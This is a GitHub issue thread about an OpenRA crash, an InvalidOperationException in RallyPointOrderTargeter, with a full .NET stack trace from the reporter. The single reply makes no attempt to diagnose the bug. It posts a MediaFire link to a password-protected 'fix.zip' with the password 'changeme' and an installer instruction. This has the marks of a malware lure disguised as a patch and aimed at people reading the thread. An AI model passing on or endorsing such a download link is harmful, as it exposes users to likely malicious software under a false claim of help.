### ISSUE TITLE
InvalidOperationException: Attempted to get trait from destroyed object at RallyPointOrderTargeter

### ISSUE THREAD

**Issue by evanmarlo** [OpenRA/OpenRA#21564]
## System Information

- Operating System:  Windows 11
- OpenRA Version: 20231010
- OpenRA Mod: 20231010
- Source: Official download package

## Exception log

```
OpenRA engine version release-20231010
OpenRA Language: en
Red Alert mod version release-20231010
on map 2063f6f04b3cc14d51b4a08e355889a9b4b84bad (Asymmetric Battle by Seru).
Date: 2024-08-29 02:24:15Z
Operating System: Windows (X64, Microsoft Windows NT 10.0.22631.0)
Runtime Version: .NET CLR 6.0.22
Installed Language: en (Installed) en (Current) en (Current UI)
Exception of type `System.InvalidOperationException`: Attempted to get trait from destroyed object (e3 2942 (not in world))
   at OpenRA.TraitDictionary.CheckDestroyed(Actor actor)
   at OpenRA.TraitDictionary.GetOrDefault[T](Actor actor)
   at OpenRA.Mods.Common.Traits.RallyPoint.RallyPointOrderTargeter.<>c.<CanTarget>b__15_0(Actor a)
   at System.Linq.Enumerable.SelectEnumerableIterator`2.MoveNext()
   at System.Linq.Enumerable.WhereEnumerableIterator`1.MoveNext()
   at System.Linq.OrderedEnumerable`1.TryGetFirst(Boolean& found)
   at System.Linq.Enumerable.TryGetFirst[TSource](IEnumerable`1 source, Boolean& found)
   at OpenRA.Mods.Common.Traits.RallyPoint.RallyPointOrderTargeter.CanTarget(Actor self, Target& target, TargetModifiers& modifiers, String& cursor)
   at OpenRA.Mods.Common.Orders.UnitOrderGenerator.OrderForUnit(Actor self, Target target, CPos xy, MouseInput mi)
   at OpenRA.Mods.Common.Orders.UnitOrderGenerator.<>c__DisplayClass8_0.<GetCursor>b__0(Actor a)
   at System.Linq.Enumerable.SelectEnumerableIterator`2.MoveNext()
   at System.Linq.Enumerable.WhereEnumerableIterator`1.MoveNext()
   at OpenRA.Exts.CompareBy[T,U](IEnumerable`1 ts, Func`2 selector, Int32 modifier, Boolean throws)
   at OpenRA.Mods.Common.Orders.UnitOrderGenerator.GetCursor(World world, CPos cell, int2 worldPixel, MouseInput mi)
   at OpenRA.Mods.Common.Widgets.WorldInteractionControllerWidget.<>c__DisplayClass16_0.<GetCursor>b__0()
   at OpenRA.Sync.RunUnsynced[T](Boolean checkSyncHash, World world, Func`1 fn)
   at OpenRA.Widgets.Widget.GetCursorOuter(int2 pos)
   at OpenRA.Widgets.Widget.GetCursorOuter(int2 pos)
   at OpenRA.Widgets.Widget.GetCursorOuter(int2 pos)
   at OpenRA.Widgets.Widget.GetCursorOuter(int2 pos)
   at OpenRA.Game.RenderTick()
   at OpenRA.Game.Loop()
   at OpenRA.Game.Run()
   at OpenRA.Game.InitializeAndRun(String[] args)
   at OpenRA.WindowsLauncher.WindowsLauncher.RunGame(String[] args)
```

## Additional information
I got nuked by multiple players at the same time, and the game crashed.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
